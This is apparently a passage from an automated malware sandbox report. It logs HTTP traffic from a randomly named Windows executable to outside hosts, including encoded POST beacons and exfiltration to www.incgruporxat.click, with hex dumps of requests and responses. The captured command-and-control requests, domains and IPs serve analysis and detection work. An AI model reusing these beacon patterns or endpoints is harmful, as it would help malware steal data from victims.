                                                                                                                                      Data Ascii: sTS=yhPws430kmwkutqvwq/pngNCMyY1QFi+rSQg+7GFRFZeW9MFGoeUsUtFFHG1T7ZCkp3fVORzz1nk55xZKzUk78Cu54CrP5W/dnHjXBH2M0UzqgxCE0KN49+HYQvoqJkbNkhmweGUwfT2S2IbRrLpuBs2geEAf0L+m9OlqoWzqXdB+e+LDTBtFmhoEPagOKhV8CNGjZ0TpsQ8bBtKEDhxkeUZfcQSiaR9eK7aUE5nmNSHAjbGE/FspusCVe1jbwonh73rdLvgmwBM5No99iXL9hugD7mn9B20nRpGVLniL5/kMHybjY7tuuiZoof69sBaJzfzOTJdDxoTW88z/sqkRFD8jAY9TDtqyyAVvwtv2hQPg2zDpz2KVLxrtxOgT45uLkfrb/EU+Ag6j3AlVIZzuP04vf5HYDm6xCUgta/n/eSSiS0cIYvVQseLkU4PhgMavx2vhq8LqaI88e4WfaPmsIwG5WVF9yOSBIz8oMyIjExD6muULq7lYB1uReJdPSr/pwC4WaVuc4sFfcasEnueHr15094JRBRQWlaEk02uT5apmZqJFKHYlVDbc8fIrPSFMiVktakx8xiqwGX9DAizEPKxtOU7elQ0P20orbvBojzPLrbcAy87jv5TXg+XRhipCLIVp9IqqIOsvlsJ+P7j8/EZ0Jr5bqyYmGsSfzHTuqf9U8KO1FrfQWfaDpekojHA7QuGCEN17201yefqDmfyds7siFJ4xr6uwXyzO6KERHcg1BMr0qdG/R45sMdhcX6+40gcLaKTTPrIlLc9XI7oN0/ed+rypzjtnF+LKy+yHpDz3KSknSPXXH7GsEics07WzKWxiTkocsXLS7TYadQFiy4o+Q07aJVI++oB8V2LJqHEdl1p8idR3fsj5nii2jJXMxmt8pq1JWlDH5cj6IyvL0LPN4pY5b1ej6JcWFJAy5kd0vxHffs2z+hMGfZz+7bwVZ2LfweznPEekXVvtLZQmyOquNThTDbpBnhLbMqvKS2U7gyD [TRUNCATED]


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      48192.168.2.450056208.91.197.27804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:38.129260063 CET448OUTGET /9pyp/?sTS=/jnQvNiesFQPp+Sr+qvu3BcQPRo0em6f7Q4t/avNQHldTt5geLOnsXFtMBLfdtd6me/HPN9T8yryju1POCks88Xo3NK0HfOsZ2ntIEnTG3MwtjQxG1je1c4=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.joeltcarpenter.online
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:39:39.184936047 CET1236INHTTP/1.1 200 OK
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:38 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                      Set-Cookie: vsid=910vr4841303783200380; expires=Thu, 10-Jan-2030 08:39:38 GMT; Max-Age=157680000; path=/; domain=www.joeltcarpenter.online; HttpOnly
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 34 31 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 68 70 56 34 55 6e 32 6a 55 35 68 4a 4f 56 54 70 4e 54 51 35 73 74 4d 66 4c 6e 31 70 47 74 30 2b 69 66 32 4f 6f 6f 36 47 66 46 63 48 75 5a 75 51 4c 38 42 38 38 55 52 54 48 69 6e 56 62 32 62 43 73 45 36 55 32 66 79 31 62 6d 34 73 55 2b 4d 36 65 62 30 51 31 67 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED]
                                                                                                                                      Data Ascii: 41c5<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_hpV4Un2jU5hJOVTpNTQ5stMfLn1pGt0+if2Ooo6GfFcHuZuQL8B88URTHinVb2bCsE6U2fy1bm4sU+M6eb0Q1g==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink
                                                                                                                                      Jan 11, 2025 09:39:39.184967995 CET109INData Raw: 2d 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6a 6f 65 6c 74 63 61 72 70 65 6e 74 65 72 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a
                                                                                                                                      Data Ascii: -to-fit=no"/> <title>joeltcarpenter.online</title> <style media="screen">.asset_star0 {background:
                                                                                                                                      Jan 11, 2025 09:39:39.184984922 CET1236INData Raw: 20 75 72 6c 28 27 2f 2f 64 33 38 70 73 72 6e 69 31 37 62 76 78 75 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 74 68 65 6d 65 73 2f 61 73 73 65 74 73 2f 73 74 61 72 30 2e 67 69 66 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 3b 0a
                                                                                                                                      Data Ascii: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;width: 13px;height: 12px;display: inline-block;}.asset_star1 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star1.gif') no-repeat cent
                                                                                                                                      Jan 11, 2025 09:39:39.185003996 CET224INData Raw: 6f 72 3a 76 69 73 69 74 65 64 2c 0a 2e 68 65 61 64 65 72 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 6c 69 6e 6b 2c 0a 2e 68 65 61 64 65 72 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 3b 0a 7d 0a 0a 2e 63
                                                                                                                                      Data Ascii: or:visited,.header-text-color:link,.header-text-color { color:#848484;}.comp-is-parked { margin: 4px 0 2px;}.comp-sponsored { text-align: left; margin: 0 0 -1.8rem 4px;}.wrapper1 { margin:1rem;}.w
                                                                                                                                      Jan 11, 2025 09:39:39.185014963 CET1236INData Raw: 72 61 70 70 65 72 32 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 2f 64 33 38 70 73 72 6e 69 31 37 62 76 78 75 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 74 68 65 6d 65 73 2f 63 6c 65 61 6e 50 65 70 70 65 72 6d 69
                                                                                                                                      Data Ascii: rapper2 { background:url('//d38psrni17bvxu.cloudfront.net/themes/cleanPeppermintBlack_657d9013/img/bottom.png') no-repeat center bottom; padding-bottom:140px;}.wrapper3 { background:#fff; max-width:300px; margin:0 auto 1
                                                                                                                                      Jan 11, 2025 09:39:39.185038090 CET1236INData Raw: 6f 74 74 6f 6d 3a 30 3b 0a 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 36 30 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 77 72 61 70 70 65 72 33 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 35 33 30 70 78 3b
                                                                                                                                      Data Ascii: ottom:0; min-height:600px; } .wrapper3 { max-width:530px; background:none; }}</style> <style media="screen">.fallback-term-holder { display: inline-grid; grid-template-columns: 1fr; width:
                                                                                                                                      Jan 11, 2025 09:39:39.185050964 CET1236INData Raw: 65 72 2d 72 61 64 69 75 73 3a 20 2e 31 32 35 65 6d 3b 20 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 20 31 66 72 20 31 66 72 20 31 66 72 3b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 67 72 69 64 22 3e 0a 20 20 20 20
                                                                                                                                      Data Ascii: er-radius: .125em; grid-template-columns: 1fr 1fr 1fr; display: inline-grid"> <div style="grid-column: 1 / span 1; grid-row-start: 1; grid-row-end: span 2; justify-self: start; align-self: center"> <br/> <script async src='http
                                                                                                                                      Jan 11, 2025 09:39:39.185061932 CET1236INData Raw: 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 2f 6a 6f 65 6c 74 63
                                                                                                                                      Data Ascii: </div> </div> <div class="footer"> <a href="//joeltcarpenter.online/__media__/js/trademark.php?d=joeltcarpenter.online&type=ns">Trademark Free</a><br><br><a href="https://customerservice.web.com/prweb/PRAuth/app
                                                                                                                                      Jan 11, 2025 09:39:39.185074091 CET1236INData Raw: 41 74 74 72 69 62 75 74 69 6f 6e 27 3a 20 27 23 61 61 61 27 2c 0a 20 20 20 20 20 20 20 20 27 63 6f 6c 6f 72 54 69 74 6c 65 4c 69 6e 6b 27 3a 20 27 23 30 32 37 37 62 64 27 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 41 6c 70 68 61 62 65 74 69 63 61 6c
                                                                                                                                      Data Ascii: Attribution': '#aaa', 'colorTitleLink': '#0277bd', // Alphabetically 'horizontalAlignment': 'center', 'noTitleUnderline': false, 'rolloverLinkColor': '#01579b', 'verticalSpacing': 10 }; v
                                                                                                                                      Jan 11, 2025 09:39:39.185086012 CET552INData Raw: 57 55 31 4f 57 52 69 4e 6a 41 78 4e 7a 4a 6a 66 44 42 38 5a 48 41 74 64 47 56 68 62 57 6c 75 64 47 56 79 62 6d 56 30 4d 44 6c 66 4d 33 42 6f 66 44 42 38 4d 48 78 38 66 48 77 3d 27 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 64 6f 6d 61 69 6e 3d 27
                                                                                                                                      Data Ascii: WU1OWRiNjAxNzJjfDB8ZHAtdGVhbWludGVybmV0MDlfM3BofDB8MHx8fHw='; let domain='joeltcarpenter.online'; let scriptPath='https://rnatrk.com'; let adtest='off';if(top.location!==location) { top.location.href=location.protocol +
                                                                                                                                      Jan 11, 2025 09:39:39.189982891 CET1236INData Raw: 20 27 64 70 2d 74 65 61 6d 69 6e 74 65 72 6e 65 74 30 31 27 2c 27 72 65 73 75 6c 74 73 50 61 67 65 42 61 73 65 55 72 6c 27 3a 20 27 2f 2f 27 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 3f 74 73 3d 27 2c 27 66 6f 6e 74 46 61 6d
                                                                                                                                      Data Ascii: 'dp-teaminternet01','resultsPageBaseUrl': '//' + location.host + '/?ts=','fontFamily': 'arial','optimizeTerms': true,'maxTermLength': 40,'adtest': true,'clicktrackUrl': '//' + location.host + '/track.php?','attributionText': 'Ads','colorAttri


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      49192.168.2.450057104.21.88.139804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:44.322094917 CET720OUTPOST /rm8a/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.incgruporxat.click
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.incgruporxat.click
                                                                                                                                      Referer: http://www.incgruporxat.click/rm8a/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 4f 34 76 74 52 49 4c 69 47 2f 61 56 6a 44 2b 32 30 65 7a 65 6e 58 74 65 4f 49 44 54 2f 42 4c 7a 6e 74 78 4c 77 6c 38 70 6b 52 65 50 57 4c 2f 58 61 36 6a 77 4f 5a 49 35 66 6d 49 49 6d 67 39 78 4c 69 69 54 58 4b 6b 74 79 4c 70 5a 37 31 56 4c 4d 4e 6e 69 73 68 72 53 47 71 7a 2b 56 75 4b 6c 77 4f 52 5a 30 42 50 35 43 4a 6f 41 2b 53 4a 39 5a 53 63 44 6d 71 36 52 44 48 36 2f 61 6f 77 67 45 44 47 4e 35 6f 50 71 71 38 6e 50 39 55 4c 47 47 53 50 31 33 50 41 54 44 58 78 6b 56 58 71 67 35 75 63 6b 69 4d 4a 70 2f 46 34 7a 49 32 39 36 76 53 69 78 6b 69 38 7a 6c 4c 6f 4a 4c 4f 30 78 58 67 3d 3d
                                                                                                                                      Data Ascii: sTS=O4vtRILiG/aVjD+20ezenXteOIDT/BLzntxLwl8pkRePWL/Xa6jwOZI5fmIImg9xLiiTXKktyLpZ71VLMNnishrSGqz+VuKlwORZ0BP5CJoA+SJ9ZScDmq6RDH6/aowgEDGN5oPqq8nP9ULGGSP13PATDXxkVXqg5uckiMJp/F4zI296vSixki8zlLoJLO0xXg==
                                                                                                                                      Jan 11, 2025 09:39:44.937340975 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:44 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                      pragma: no-cache
                                                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CEBCD8y5KK2n%2BrsBbonTmtvVY2Paq77HTOEx8sgSfdYraiT4PVE2S6C2tc5MntIBiC9rYpbnAaoyj1JCMq0g6ougWqlvkpAf3ny6OSV5clmreWElW9vLsJozMGPBp6kI9n0hqxCIH9%2BJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 9003991889030f78-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1636&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=720&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f
                                                                                                                                      Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO
                                                                                                                                      Jan 11, 2025 09:39:44.937367916 CET421INData Raw: 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8
                                                                                                                                      Data Ascii: 6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>ylo:J8OP=g
                                                                                                                                      Jan 11, 2025 09:39:44.937665939 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      50192.168.2.450058104.21.88.139804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:46.871189117 CET740OUTPOST /rm8a/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.incgruporxat.click
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.incgruporxat.click
                                                                                                                                      Referer: http://www.incgruporxat.click/rm8a/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 4f 34 76 74 52 49 4c 69 47 2f 61 56 73 41 6d 32 32 2f 7a 65 68 33 74 52 58 34 44 54 6b 78 4c 2f 6e 74 39 4c 77 6b 34 66 6e 69 71 50 57 72 76 58 49 49 62 77 43 35 49 35 51 47 49 4a 37 77 39 45 4c 6a 66 75 58 49 41 74 79 4c 74 5a 37 30 6c 4c 4c 2b 66 68 2b 42 72 55 64 36 7a 38 49 65 4b 6c 77 4f 52 5a 30 42 7a 44 43 4a 41 41 39 69 35 39 59 33 77 43 34 36 36 53 41 48 36 2f 51 34 77 6b 45 44 48 59 35 73 58 51 71 35 6a 50 39 51 62 47 47 47 6a 36 67 2f 41 56 65 48 77 52 64 58 7a 35 68 62 74 72 6d 50 52 37 37 6b 51 6f 4e 77 77 67 2b 6a 44 6d 32 69 59 41 34 4d 68 39 47 4e 4a 34 4d 76 69 64 52 42 7a 58 47 54 41 55 2f 31 2b 55 45 44 49 52 68 56 55 3d
                                                                                                                                      Data Ascii: sTS=O4vtRILiG/aVsAm22/zeh3tRX4DTkxL/nt9Lwk4fniqPWrvXIIbwC5I5QGIJ7w9ELjfuXIAtyLtZ70lLL+fh+BrUd6z8IeKlwORZ0BzDCJAA9i59Y3wC466SAH6/Q4wkEDHY5sXQq5jP9QbGGGj6g/AVeHwRdXz5hbtrmPR77kQoNwwg+jDm2iYA4Mh9GNJ4MvidRBzXGTAU/1+UEDIRhVU=
                                                                                                                                      Jan 11, 2025 09:39:47.397185087 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:47 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                      pragma: no-cache
                                                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XAXpYLOYWnpWeejz%2BJ%2BHL7N7ePGHz1fPfgWPiCFLoisn9QDeRE45bEkzK%2BRsVpVHLLmGXixjdNf8G0kqmWcKH7gFjhH392LHLKAySBRssw27rWQiKCPNSiHsHbC8bwiQ97RMqKjViKel"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399286feede99-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1629&rtt_var=814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57
                                                                                                                                      Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweW
                                                                                                                                      Jan 11, 2025 09:39:47.397242069 CET423INData Raw: 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72
                                                                                                                                      Data Ascii: BO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>ylo:J8OP=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      51192.168.2.450059104.21.88.139804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:49.414685965 CET10822OUTPOST /rm8a/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.incgruporxat.click
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.incgruporxat.click
                                                                                                                                      Referer: http://www.incgruporxat.click/rm8a/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 4f 34 76 74 52 49 4c 69 47 2f 61 56 73 41 6d 32 32 2f 7a 65 68 33 74 52 58 34 44 54 6b 78 4c 2f 6e 74 39 4c 77 6b 34 66 6e 6a 53 50 58 64 6a 58 5a 5a 62 77 4d 5a 49 35 5a 6d 49 55 37 77 39 64 4c 69 33 71 58 49 39 50 79 4a 6c 5a 36 57 64 4c 4b 50 66 68 6e 78 72 55 55 61 7a 35 56 75 4b 30 77 4f 42 6a 30 41 66 44 43 4a 41 41 39 6b 64 39 52 43 63 43 36 36 36 52 44 48 36 4a 61 6f 78 78 45 44 65 6a 35 73 43 76 71 4e 58 50 2b 78 33 47 48 31 62 36 69 66 41 58 64 48 77 4a 64 58 50 63 68 61 46 4a 6d 4d 4e 56 37 6e 4d 6f 50 30 35 49 68 58 61 2f 68 68 73 45 37 2b 5a 57 65 4c 4a 5a 43 4d 57 35 65 53 54 6f 56 53 6c 37 78 56 43 51 63 68 55 78 6a 79 56 6f 51 71 48 54 6d 6a 48 64 65 6c 46 2f 31 39 4e 33 4f 72 5a 59 69 32 68 75 71 72 56 72 68 37 63 67 2f 43 2f 77 4a 46 69 63 2f 6d 34 64 37 51 34 78 4d 58 66 66 32 6b 66 76 52 71 54 51 61 33 42 56 77 34 5a 42 57 66 41 39 7a 71 49 41 35 59 74 49 30 55 2f 57 4c 64 49 39 4e 59 4a 51 6e 64 56 5a 35 59 51 42 62 6c 46 44 4d 6a 39 6c 61 46 46 44 7a 57 2f 42 71 42 [TRUNCATED]
